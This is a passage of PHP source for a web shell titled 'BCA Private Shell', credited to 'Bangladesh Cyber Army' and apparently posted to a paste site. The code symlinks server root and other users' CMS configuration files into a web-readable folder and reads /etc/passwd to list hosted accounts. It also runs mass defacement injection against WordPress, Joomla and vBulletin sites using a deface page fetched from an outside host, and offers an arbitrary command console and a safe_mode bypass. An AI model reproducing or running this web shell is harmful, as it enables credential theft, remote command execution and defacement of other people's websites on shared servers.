  729. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  730. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  731. }
  732. }
  733. $lol = explode("/",curPageURL());
  734. $link = str_replace(end($lol),"",curPageURL());
  735. $str = file_get_contents($link."/bca");
  736. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
  737. if(is_array($exp[2])){
  738. $q = 2;
  739. $dmn = getDnamed();
  740. foreach($exp[2] as $sitez){
  741. if($q == 2){$q = 1;}else{$q = 2;}
  742. $j += 1;
  743. $sn = explode("-",$sitez);
  744. $domain = $dmn[$sn[0]];
  745. if($domain){
  746. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
  747. }else{
  748. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
  749. }
  750. $nan .= '<div id="inj'.$j.'">
  751. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
  752. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
  753. <div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
  754. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
  755. </div>';
  756. }
  757. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
  758. echo $nan.$cnt;
  759. }
  760. }
  761. die();
  762. }
  763. elseif($_POST['ac'] == "chkph2"){
  764. if(is_readable("/etc/passwd")){
  765. if(!is_dir("bca")){
  766. @mkdir('bca',0777);
  767. }
  768. if(!is_link("bca/root")){
  769. $sym = symlink("/","bca/root");
  770. if(!$sym){
  771. die("Symlink method failed.");
  772. }
  773. }
  774. $htaccss = "Options all
  775. DirectoryIndex Sux.html
  776. AddType text/plain .php
  777. AddHandler server-parsed .php
  778.  AddType text/plain .html
  779. AddHandler txt .html
  780. Require None
  781. Satisfy Any";
  782. file_put_contents("bca/.htaccess",$htaccss);
  783. $etc = file_get_contents("/etc/passwd");
  784. $etcz = explode("\n",$etc);
  785. $lol = explode("/",curPageURL());
  786. $link = str_replace(end($lol),"",curPageURL());
  787. @unlink("rootinject.tmp");
  788. $q = 2;
  789. $dmn = getDnamed();
  790. foreach($etcz as $etz){
  791. $etcc = explode(":",$etz);
  792. $dr = "bca/root/home/".$etcc[0]."/public_html/";
  793. $dan = chkSys($link.$dr);
  794. if($dan){
  795. if($q == 2){$q = 1;}else{$q = 2;}
  796. $domain = $dmn[$etcc[0]];
  797. if($domain){
  798. $domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
  799. }else{
  800. $domain = "<a id='inj_dom".$k."' href=''>...</a>";
  801. }
  802. $k += 1;
  803. $nant = '<div id="inj'.$k.'">
  804. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
  805. <div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
  806. <div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
  807. <div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
  808. </div>';
  809. file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
  810. $nan .= $nant;
  811. }
  812. }
  813. $cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
  814. echo $nan.$cnt;
  815. }
  816. die();
  817. }
  818. elseif($_POST['ac'] == "inject"){
  819. error_reporting(0);
  820. $cms = strtolower($_POST['cms']);
  821. $cnf = $_POST['conf'];
  822. if(file_exists(md5($_POST['deface_page']))){
  823. $html = file_get_contents(md5($_POST['deface_page']));
  824. }else{
  825. $html = file_get_contents($_POST['deface_page']);
  826. file_put_contents(md5($_POST['deface_page']),$html);
  827. file_put_contents("bca.html",$html);
  828. }
  829. if(!is_dir("cookie")){
  830. @mkdir("cookie",0777);
  831. }
  832. switch($cms){
  833. case "wordpress":
  834. doXploitWP($cnf,$html,"uradhura123");
  835. break;
  836. case "joomla":
  837. doXploitJM($cnf,$html,"uradhura123");
  838. break;
  839. case "vbulletin":
  840. doXploitVB($cnf,$html);
  841. break;
  842. case "phpbb":
  843. break;
  844. case "ipb":
  845. break;
  846. case "mybb":
  847. break;
  848. case "oscommerce":
  849. break;
  850. case "smf":
  851. break;
  852. case "drupal":
  853. break;
  854. case "seditio":
  855. break;
  856. case "e107":
  857. break;
  858. }
  859. throwErr("Not Added");
  860. }
  861. elseif($_POST['ac'] == "ssh"){
  862. $ssh = exme($_POST['command']);
  863. die(nl2br($ssh));
  864. }
  865. elseif($_POST['ac'] == "phpinfo"){
  866. $php = phpinfo();
  867. die($php);
  868. }
  869. ;echo '<html>
  870. <title>BCA Private Shell</title>
  871. <head>
  872. <script src="http://code.jquery.com/jquery-latest.min.js"></script>
  873. </head>
  874. <body bgcolor="black" background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif">
  875. <style>
  876. body{
  877. font-family: "courier new";
  878. background-color: black;
  879. font-size:80%;
  880. color: #28FE14;
  881. background-image: url("data:image/gif;base64,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");
  882. }
  883. #sysinfo{
  884. border: 1px solid #28FE14;
  885. position:fixed;
  886. padding:2px;
  887. top:1px;
  888. left:1px;
  889. background-color: black;
  890. font-size:12px;
  891. }
  892. #phpinfo{
  893. border: 1px solid #28FE14;
  894. position:fixed;
  895. padding:2px;
  896. top:1px;
  897. right:1px;
  898. background-color: black;
  899. font-size:12px;
  900. }
  901. #status{
  902. border: 1px solid #28FE14;
  903. position:fixed;
  904. padding:2px;
  905. bottom:1px;
  906. right:1px;
  907. background-color: black;
  908. font-size:12px;
  909. }
  910. #infobox{
  911. z-index:1;
  912. border: 1px solid white;
  913. margin-left:auto;
  914. margin-right:auto;
  915. margin-top:50px;
  916. width:600px;
  917. background-color: black;
  918. font-size:12px;
  919. }
  920. .infotitle{
  921. padding:4px;
  922. background-color: white;
  923. color: black;
  924. font-family: Thaoma;
  925. font-size:14px;
  926. }
  927. .infotxt{
  928. padding:5px;
  929. }
  930.  
  931. .sidebar{
  932. position:fixed;
  933. left:1px;
  934. top:30%;
  935. }
  936. .stitle{
  937. float:left;
  938. cursor:pointer;
  939. padding:7px;
  940. color:black;
  941. background-color: white;
  942. }
  943. .stitle:hover{
  944. color:red;
  945. }
  946. .smnu{
  947. display:none;
  948. background-color: black;
  949. padding:5px;
  950. border: 1px solid white;
  951. float:left;
  952. }
  953. a{
  954. color: #df5;
  955. text-decoration: none;
  956. }
  957. a:hover{
  958. color:white;
  959. }
  960. .copyright{
  961. position:fixed;
  962. bottom:1px;
  963. left:1px;
  964. padding:2px;
  965. }
  966. .logo{
  967. margin:auto;
  968. width:600px;
  969. height:600px;
  970. background-image: url("http://4.bp.blogspot.com/-DEFzMZtxffI/Tz11pJscP9I/AAAAAAAAAIQ/4UKKPprIg5U/s1600/jh3gj7.gif");
  971. }
  972. .filetable{
  973. margin-top:2px;
  974. width:740px;
  975. }
  976. .tblcnt{
  977. text-align: center;
  978. margin-left:2px;
  979. color:black;
  980. background-color: white;
  981. padding:3px;
  982. float:left;
  983. border: 1px solid white;
  984. }
  985. .tblbx1{
  986. height:12px;
  987. text-align: center;
  988. margin-left:2px;
  989. color:white;
  990. background-color: #333333;
  991. padding:3px;
  992. float:left;
  993. border: 1px solid #333333;
  994. }
  995. .tblbx2{
  996. height:12px;
  997. text-align: center;
  998. margin-left:2px;
  999. color:white;
  1000. background-color: #444444;
  1001. padding:3px;
  1002. float:left;
  1003. border: 1px solid #444444;
  1004. }
  1005.  
  1006. .tbl{
  1007. margin-top:100px;
  1008. padding-top:2px;
  1009. padding-bottom: 2px;
  1010. margin:auto;
  1011. width:742px;
  1012. border: 1px solid white;
  1013. }
  1014. .rbox{
  1015. float:left;
  1016. border: 1px solid #28FE14;
  1017. padding:10px;
  1018. }
  1019. .smit{
  1020. background-color: black;
  1021. color: #28FE14;
  1022. }
  1023. .sshbox{
  1024. display:none;
  1025. padding-left:7px;
  1026. width:600px;
  1027. height:400px;
  1028. margin: auto;
  1029. margin-top:80px;
  1030. -webkit-border-radius: 10px;
  1031. -moz-border-radius: 10px;
  1032. border-radius: 10px;
  1033. border:3px solid #FFF5F5;
  1034. background-color:#080500;
  1035. overflow:auto;
  1036. }
  1037. #sshcmd{
  1038. width:450px;
  1039. background-color: #080500;
  1040. color:#28FE14;
  1041. border:none;
  1042. }
  1043.  
  1044. </style>
  1045. <body>
  1046. <div class="logo" id="logo"></div>
  1047. <div id="sysinfo"><strong>OS:</strong> ';echo php_uname("s")." - ".php_uname("r")." /  ".php_uname("m");;echo '</div>
  1048.  
  1049. <div id="phpinfo"> ';
  1050. $srvsoft = explode(" ",$_SERVER['SERVER_SOFTWARE']);
  1051. echo $srvsoft[0];
  1052. echo " PHP ".phpversion();
  1053. if( ini_get('safe_mode') ){
  1054. echo " <font color='red'>Safe Mode On</font>";
  1055. }else{
  1056. echo " <font color='blue'>Safe Mode Off</font>";
  1057. }
  1058. ;echo '</div>
  1059.  
  1060. <div id="tbl" class="tbl" style="display:none;">
  1061. <div class="filetable">
  1062. <div class="tblcnt" style="width:220px;">Name</div>
  1063. <div class="tblcnt" style="width:80px;">Size</div>
  1064. <div class="tblcnt" style="width:100px;">Modify</div>
  1065. <div class="tblcnt" style="width:100px;">Owner</div>
  1066. <div class="tblcnt" style="width:100px;">Permission</div>
  1067. <div class="tblcnt" style="width:80px;">Action</div>
  1068. </div>
  1069. <div id="filest"></div>
  1070. <div style="clear:both;"></div>
  1071.  
  1072. </div>
  1073.  
  1074. <div id="inject" class="tbl" style="display:none;">
  1075. <div class="filetable">
  1076. <div class="tblcnt" style="width:200px; cursor:pointer;" onClick="doSlct();">User</div>
  1077. <div class="tblcnt" style="width:220px;">Sitename</div>
  1078. <div class="tblcnt" style="width:160px;">CMS</div>
  1079. <div class="tblcnt" style="width:120px;">Status</div>
  1080. </div>
  1081. <div id="injtbl"></div>
  1082. <div style="clear:both;"></div>
  1083.  
  1084. </div>
  1085.  
  1086. <div id="infobox" style="display:none;"><div class="infotitle"><a href="" onclick="$(\'#infobox\').hide();return false;" style="color:black;">[-]</a> <span id="infotitle">Information</span></div><div class="infotxt" id="infotxt"></div></div>
  1087. <script>
  1088.  
  1089. var sidebar = false;
  1090. var sidebar2 = false;
  1091. function sidebarz(){
  1092. $(\'#logo\').hide();
  1093. if(sidebar){
  1094. $(\'#smnu\').hide();
  1095. sidebar = false;
  1096. }else{
  1097. $(\'#smnu\').show();
  1098. sidebar = true;
  1099. }
  1100. }
  1101. function sidebarz2(){
  1102. if(sidebar2){
  1103. $(\'#smnu2\').hide();
  1104. sidebar2 = false;
  1105. }else{
  1106. $(\'#smnu2\').show();
  1107. sidebar2 = true;
  1108. }
  1109. }
  1110.  
  1111. function filebrs(val){
  1112. hideAll();
  1113. $(\'#status\').html(\'Status: Requesting...\');
  1114. $.post("", { ac: "browse", path: val},
  1115. function(data) {
  1116. $(\'#tbl\').show();
  1117. $(\'#status\').html(\'Status: Completed (:\');
  1118. $(\'#filest\').html(data);
  1119. });
  1120. }
  1121. function doUpdt(val){
  1122. var refreshId = setInterval(function() {
  1123.      $("#injtbl").load(\'rootinject.tmp\');
  1124.   }, 5000);
  1125.   $.ajaxSetup({ cache: false });
  1126.  
  1127. hideAll();
  1128. $(\'#inject\').show();
  1129. $(\'#status\').html(\'Status: Requesting...\');
  1130. $.post("", { ac: val},
  1131. function(data) {
  1132. refreshId = "";
  1133. $(\'#sidebar2\').show();
  1134. $(\'#status\').html(\'Status: Completed (:\');
  1135. $(\'#injtbl\').html(data);
  1136. });
  1137.  
  1138. }
  1139.  
  1140. function hideAll(){
  1141. k1 = 0;
  1142. k2 = 0;
  1143. $(\'#sidebar2\').hide();
  1144. $(\'#tbl\').hide();
  1145. $(\'#inject\').hide();
  1146. $(\'#infobox\').hide();
  1147. $(\'#sshbox\').hide();
  1148. }
  1149.  
  1150. function doReq(val){
  1151. hideAll();
  1152. $(\'#inject\').show();
  1153. $(\'#status\').html(\'Status: Requesting...\');
  1154. $.post("", { ac: val},
  1155. function(data) {
  1156. $(\'#sidebar2\').show();
  1157. $(\'#status\').html(\'Status: Completed (:\');
  1158. $(\'#injtbl\').html(data);
  1159. });
  1160. }
  1161.  
  1162. function doReq2(val){
  1163. hideAll();
  1164. $(\'#status\').html(\'Status: Requesting...\');
  1165. $.post("", { ac: val},
  1166. function(data) {
  1167. $(\'#infobox\').show();
  1168. $(\'#status\').html(\'Status: Completed (:\');
  1169. $(\'#infotxt\').html(data);
  1170. });
  1171. }
  1172.  
  1173. //Js Multi thread post request by Elo (:
  1174. var k1 = 1; var k2 = 0; var req_limit = 9;
  1175. function doInject(){
  1176. var i = 0; var j = 0;
  1177. $(\'.conf\').each(function(){
  1178. i += 1;
  1179. var id = $(this).attr(\'title\');
  1180.  
  1181. if(id > k1){
  1182. j += 1; k1 += 1;
  1183. var link = $(this).attr(\'href\');
  1184.  
  1185. var domain = $(\'#inj_dom\' + id).html();
  1186. var cms = $(this).html();
  1187. doPost2(link,cms,id,domain);
  1188. }
  1189. if(j > req_limit){return false;}
  1190.  
  1191.  
  1192. });
  1193. }
  1194.  
  1195.  
  1196.  
  1197. function doPost2(link,cmz,id,dmn){
  1198. if($(\'#injchk\'+id).is(\':checked\')){
  1199. $(\'#inj_status\' + id).html(\'Injecting...\');
  1200. $.ajax({
  1201.  url: "",
  1202.  type: "POST",
  1203.  timeout: 60000,
  1204.  data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $(\'#ignore_def:checked\').val(), n404_php: $(\'#404_php:checked\').val(), nindex_php: $(\'#index_php:checked\').val(), nhome_php: $(\'#home_php:checked\').val(), narchive_php: $(\'#archive_php:checked\').val(), ncomment_php: $(\'#comment_php:checked\').val(), com_install: $(\'#use_com:checked\').val(), deface_page: $(\'#deface_page\').val()},
  1205.  dataType: "text"
  1206. }).done(function(msg) {
  1207.  
  1208. k2 += 1;
  1209.  
  1210. $(\'#inj_status\' + id).html(\'Parse Error\');
  1211. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  1212. var res_data = JSON.parse(msg);
  1213.  
  1214. if(res_data.status == "success"){
  1215. $(\'#inj_domain\' + id).html(\'<a class="injwork" href="\' + res_data.site + \'">\' + res_data.site + \'</a>\');
  1216. $(\'#inj_status\' + id).css({"background-color" : "green", "color" : "white"});
  1217. $(\'#inj_status\' + id).html(\'Success\');
  1218. $(\'#injst\' + id).removeClass("conf");
  1219.  
  1220. }
  1221. else{
  1222. if(res_data.status == "error"){
  1223. $(\'#inj_status\' + id).css({"background-color" : "red", "color" : "white"});
  1224. $(\'#inj_status\' + id).html(res_data.msg);
  1225. $(\'#inj_status\' + id).addClass("injerror");
  1226. $(\'#injst\' + id).removeClass("conf");
  1227. }else{
  1228. $(\'#inj_status\' + id).addClass("injerror");
  1229. $(\'#inj_status\' + id).html(\'Unknown\');
  1230. $(\'#injst\' + id).removeClass("conf");
  1231. }
  1232. }
  1233. updateInjSts(k2);
  1234. if(k1 == k2){doInject();}
  1235. }).fail(function(jqXHR, textStatus) {
  1236. k2 += 1;
  1237. $(\'#inj_status\' + id).css({"background-color" : "black", "color" : "white"});
  1238. $(\'#inj_status\' + id).html(\'Timeout\');
  1239. updateInjSts(k2);
  1240. if(k1 == k2){doInject();}
  1241. });
  1242.  
  1243. }else{
  1244. k2 += 1;
  1245. updateInjSts(k2);
  1246. if(k1 == k2){doInject();}
  1247. }
  1248. }
  1249. //Js Multi thread post request by Elo (:
  1250. function updateInjSts(k){
  1251. var tc = $(\'#sitecount\').val();
  1252. if(tc > k){
  1253. $(\'#status\').html("Status: " + k + "/" + tc + " Injected");
  1254. }else{
  1255. $(\'#status\').html("Status: Injection Complete (:");
  1256. }
  1257. }
  1258.  
  1259. function rmvErr(){
  1260. $(\'.injerror\').each(function(){
  1261. var nano = $(this).parent();
  1262. $(nano).remove();
  1263. });
  1264. }
  1265.  
  1266. function rmvSlct(){
  1267. $(\'.conf\').each(function(){
  1268. var id = $(this).attr(\'title\');
  1269. if($(\'#injchk\'+id).is(\':checked\')){
  1270. $(\'#inj\' + id).remove();
  1271. }
  1272. });
  1273. }
  1274.  
  1275. function retryTimeout(){
  1276. k1 = 1; k2 = 0;
  1277. doInject();
  1278. }
  1279.  
  1280. function doSlct(){
  1281. $(\'.conf\').each(function(){
  1282. var id = $(this).attr(\'title\');
  1283. doToggle(id);
  1284. });
  1285. }
  1286.  
  1287. function doToggle(dd){
  1288. if($(\'#injchk\'+dd).is(\':checked\')){
  1289. $(\'#injc\'+dd).css(\'background-color\',\'red\');
  1290. $(\'#injchk\'+dd).attr(\'checked\',false);
  1291. }else{
  1292. $(\'#injc\'+dd).css(\'background-color\',\'#76BBEB\');
  1293. $(\'#injchk\'+dd).attr(\'checked\',true);
  1294. }
  1295. }
  1296.  
  1297. function doSSH(){
  1298. $(\'#status\').html("Status: Requesting...");
  1299. var cmd = $(\'#sshcmd\').val();
  1300. $(\'#sshcmd\').val("");
  1301. $.post("", { ac: "ssh",command: cmd},
  1302. function(data) {
  1303. $(\'#sshoutput\').append("[root@bca~]# <br />"+data+"<br />");
  1304. $(\'#status\').html("Status: Done.");
  1305. });
  1306. }
  1307. </script>
  1308.  
  1309. <div class="sshbox" id="sshbox">
  1310. <br />
  1311. <div id="sshoutput"></div>
  1312. [root@bca~]# <input onkeydown="if (event.keyCode == 13) doSSH();" type="text" id="sshcmd">
  1313. </div>
  1314.  
  1315. <div id="sidebar" class="sidebar">
  1316.  
  1317. <div class="smnu" id="smnu" class="smnu">
  1318. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'Security Information\');doReq2(\'secinfo\');return false;">Security Vulnerability</a></br>
  1319. &raquo; <a href="" onClick="$(\'#infobox\').show();$(\'#infotitle\').html(\'System Information\');doReq2(\'sysinfo\');return false;">System Information</a></br>
  1320. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'PHP Info\');doReq2(\'phpinfo\');return false;">PHP Info</a></br>
  1321. &raquo; <a href="" onClick="filebrs(\'\'); return false;">File Browser</a></br>
  1322. &raquo; <a href="" onClick="$(\'#infotitle\').html(\'Scanned Domains\');doReq2(\'chknamed\');return false;">Get All Domains</a></br>
  1323. &raquo; <a href="" onClick="doReq(\'chkph\');return false;">CMS Detector [Simple]</a></br>
  1324. &raquo; <a href="" onClick="$(\'#inject\').show();doUpdt(\'chkph2\');return false;">CMS Detector [root]</a></br>
  1325. &raquo; <a href="" onClick="doReq2(\'safebypass\');return false;">Bypass PHP Safe_Mode</a></br>
  1326. &raquo; <a href="">Network Tools</a></br>
  1327. &raquo; <a href="">SQL Manager(Coming Soon)</a></br>
  1328. &raquo; <a href="" onClick="hideAll(); $(\'#sshbox\').show(); return false;">Command Console</a></br>
  1329. &raquo; <a href="?ac=killme">Kill Me</a></br>
  1330.  
  1331. </div>
  1332. <div class="stitle" onClick="sidebarz();">O</br>P</br>T</br>I</br>O</br>N</br>S</div>
  1333. </div>
  1334.  
  1335. <div id="sidebar2" class="sidebar" style="display:none;right:1px;left:auto;">
  1336. <div class="smnu" style="float:right;" id="smnu2" class="smnu">
  1337. <div id="injmain">
  1338. &raquo; <a href="" onClick="doInject(); return false;">Start Injecting</a></br>
  1339. &raquo; <a href="" onClick="">Export</a></br>
  1340. &raquo; <a href="" onClick="rmvErr(); return false;">Remove Error</a></br>
  1341. &raquo; <a href="" onClick="rmvSlct(); return false;">Remove Selected</a></br>
  1342. &raquo; <a href="" onClick="retryTimeout(); return false;">Retry timeout</a></br>
  1343. &raquo; <a href="" onClick="alert(\'Do It Manually :p\'); return false;">Submit to Zone-H</a></br>
  1344. &raquo; <a href="" onClick="$(\'#injmain\').hide(); $(\'#inj2nd\').show(); return false;">Settings</a></br>
  1345. </div>
  1346. <div id="inj2nd" style="display:none;">
  1347. <div class="rbox">
  1348.  
  1349. <div style="clear:both;"></div>
  1350. <center><u>WordPress</u></center><br>
  1351. <input type="checkbox" name="404_php" id="404_php" checked>404.php<br />
  1352. <input type="checkbox" name="archive_php" id="archive_php" checked>archive.php<br />
  1353. <input type="checkbox" name="index_php" id="index_php" checked>index.php<br />
  1354. <input type="checkbox" name="home_php" id="home_php" checked>home.php<br />
  1355. <input type="checkbox" name="comment_php" id="comment_php" checked>comment.php<br /><br /><br />
  1356. </div>
  1357.  
  1358. <div class="rbox">
  1359. <center><u>Joomla</u></center><br>
  1360. <input type="checkbox" name="use_com" id="use_com" checked>Use Com Installer<br />
  1361. <input type="checkbox" id="ignore_def">Ignore Default Templete<br />
  1362. </div>
  1363.  
  1364. <div class="rbox">
  1365. <center><u>Default</u></center><br>
  1366. Req/s: <input type="text" class="smit" value="10" onChange="req_limit = $(this).val();"><br />
  1367. Deface Page Link: <input type="text" class="smit" id="deface_page" value="http://naramamandiri.com/index.html"><br /><br />
  1368. </div>
  1369.  
  1370. <div style="clear:both;"></div><br />
  1371. <a href="" onClick="$(\'#injmain\').show(); $(\'#inj2nd\').hide(); return false;">Go Back</a>
  1372. </div>
  1373.  
  1374.  
  1375. </div>
  1376. <div class="stitle" style="float:right;" onClick="sidebarz2();">I</br>N</br>J</br>E</br>C</br>T</br>O</br>R</div>
  1377. </div>
  1378.  
  1379. <div style="clear:both;"></div>
  1380.  
  1381. <div id="status">Status: Idle...</div>
  1382. <div class="copyright">Copyright &copy; <a href=""><font color="red">Bangladesh Cyber Army</font></a></div>
  1383. </body>
  1384. </html>';
  1385. ?>
Add Comment
Please, Sign In to add comment